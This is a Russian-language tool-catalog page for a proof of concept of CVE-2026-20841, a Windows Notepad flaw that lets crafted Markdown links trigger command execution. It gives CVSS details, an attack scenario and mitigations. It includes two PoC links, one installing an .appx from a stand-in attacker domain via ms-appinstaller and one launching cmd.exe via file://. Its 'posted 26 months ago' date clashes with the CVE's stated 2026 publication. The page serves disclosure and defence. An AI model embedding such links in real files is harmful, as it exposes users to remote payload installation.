Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20841-PoC — Доказательство концепции, демонстрирующее внедрение команд в Блокнот Windows через специально созданные ссылки Markdown, что позволяет выполнять удалённый код. Включает векторы атак, метрики CVSS и рекомендации по устранению уязвимости. | Kitploit
Инструменты/GitHubGitHub/dogukankurnaz/cve-2026-20841-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСтатьи и ИсследованияОбучение и Образование
GitHubdogukankurnaz/cve-2026-20841-poc

CVE-2026-20841-PoC

Доказательство концепции, демонстрирующее внедрение команд в Блокнот Windows через специально созданные ссылки Markdown, что позволяет выполнять удалённый код. Включает векторы атак, метрики CVSS и рекомендации по устранению уязвимости.

Репозиторий
26 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-20841 — Уязвимость удаленного выполнения кода в приложении «Блокнот» Windows

Обзор уязвимости

ПолеДетали
ID CVECVE-2026-20841
НазваниеУязвимость удаленного выполнения кода в приложении «Блокнот» Windows
ВоздействиеУдаленное выполнение кода
Максимальный уровень серьезностиВажный
CVSS v3.1 Базовый / Временный8.8 / 7.7
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
CWECWE-77: Некорректная нейтрализация специальных элементов, используемых в команде («внедрение команды»)
Затронутый продуктПриложение «Блокнот» Windows (версия из Microsoft Store, сборки до 11.2510)
Назначивший CNAMicrosoft
Опубликовано10 февраля 2026 г.
Публично раскрытоНет
ЭксплуатируетсяНет
Оценка эксплуатируемостиЭксплуатация маловероятна

Краткое описание

Некорректная нейтрализация специальных элементов, используемых в команде («внедрение команды»), в приложении «Блокнот» Windows позволяет неавторизованному злоумышленнику выполнять код по сети.

Современное приложение «Блокнот» Windows (распространяемое через Microsoft Store) получило поддержку рендеринга Markdown, включая кликабельные гиперссылки. Уязвимость существует из-за того, что «Блокнот» не выполняет надлежащую проверку и очистку схем URI в ссылках Markdown перед их обработкой. Злоумышленник может создать вредоносный файл .md, содержащий специально сформированные ссылки, которые при нажатии пользователем запускают непроверенные обработчики протоколов для загрузки и выполнения удаленного содержимого.

Метрики CVSS v3.1

Базовые метрики

МетрикаЗначение
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииОтсутствуют
Взаимодействие с пользователемТребуется
Область действияБез изменений
Влияние на конфиденциальностьВысокое
Влияние на целостностьВысокое
Влияние на доступностьВысокое

Временные метрики

МетрикаЗначение
Зрелость эксплойт-кодаНе подтверждена
Уровень устраненияОфициальное исправление
Достоверность отчетаПодтверждена

Часто задаваемые вопросы

Как злоумышленник может использовать эту уязвимость?

Злоумышленник может обманом заставить пользователя нажать на вредоносную ссылку внутри файла Markdown, открытого в «Блокноте», что приведет к запуску приложением непроверенных протоколов, загружающих и выполняющих удаленные файлы.

Каков целевой контекст удаленного выполнения кода?

Согласно метрике CVSS, вектор атаки — сеть (AV:N), и требуется взаимодействие с пользователем (UI:R). Вредоносный код будет выполняться в контексте безопасности пользователя, открывшего файл Markdown, что дает злоумышленнику те же права, что и у этого пользователя.

Сценарий атаки

  1. Злоумышленник создает файл Markdown (.md), содержащий вредоносные гиперссылки.
  2. Жертва открывает файл в уязвимой версии «Блокнота» Windows.
  3. «Блокнот» отображает Markdown и показывает кликабельные ссылки.
  4. Когда жертва нажимает на ссылку, «Блокнот» обрабатывает URI без надлежащей проверки.
  5. Это запускает обработчики протоколов (например, ms-appinstaller://), которые могут загружать и выполнять удаленные полезные нагрузки, или URI file://, которые могут напрямую запускать локальные исполняемые файлы.
  6. Вредоносный код выполняется с теми же привилегиями, что и у вошедшего в систему пользователя.

Proof of Concept

Отказ от ответственности: Этот proof of concept предоставлен строго в образовательных целях и для авторизованных исследований безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения. Несанкционированный доступ к компьютерным системам незаконен и наказуем по закону.

PoC демонстрирует два вектора атаки через специально созданные ссылки Markdown:

Вектор 1 — Удаленная установка полезной нагрузки через злоупотребление обработчиком протокола:

root@kitploit:~
[Нажмите для просмотра документа](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)

Вектор 2 — Запуск локального исполняемого файла через URI файла:

root@kitploit:~
[Нажмите здесь](file://C:/windows/system32/cmd.exe)

Демонстрация

PoC Demonstration

Устранение уязвимости

  • Обновите «Блокнот» Windows до сборки 11.2510 или более поздней через Microsoft Store.
  • Включите автоматическое обновление приложений в Windows Параметры > Приложения > Microsoft Store.
  • Не открывайте файлы .md из ненадежных источников в «Блокноте».
  • Не нажимайте на ссылки внутри файлов Markdown, полученных по электронной почте или из ненадежных загрузок.

Ссылки

  • MSRC — CVE-2026-20841
  • NVD — CVE-2026-20841
  • CVE.org — CVE-2026-20841

Правовой отказ от ответственности

Информация, представленная в этом репозитории, предназначена только для образовательных целей и авторизованных исследований безопасности. Этот proof of concept публикуется, чтобы помочь специалистам по защите понять и смягчить уязвимость. Автор не несет ответственности за любое неправомерное использование информации или инструментов, представленных здесь. Всегда получайте надлежащее письменное разрешение перед тестированием систем на уязвимости. Несанкционированный доступ к компьютерным системам является уголовным преступлением в большинстве юрисдикций. Используйте ответственно и этично.

Скачать инструмент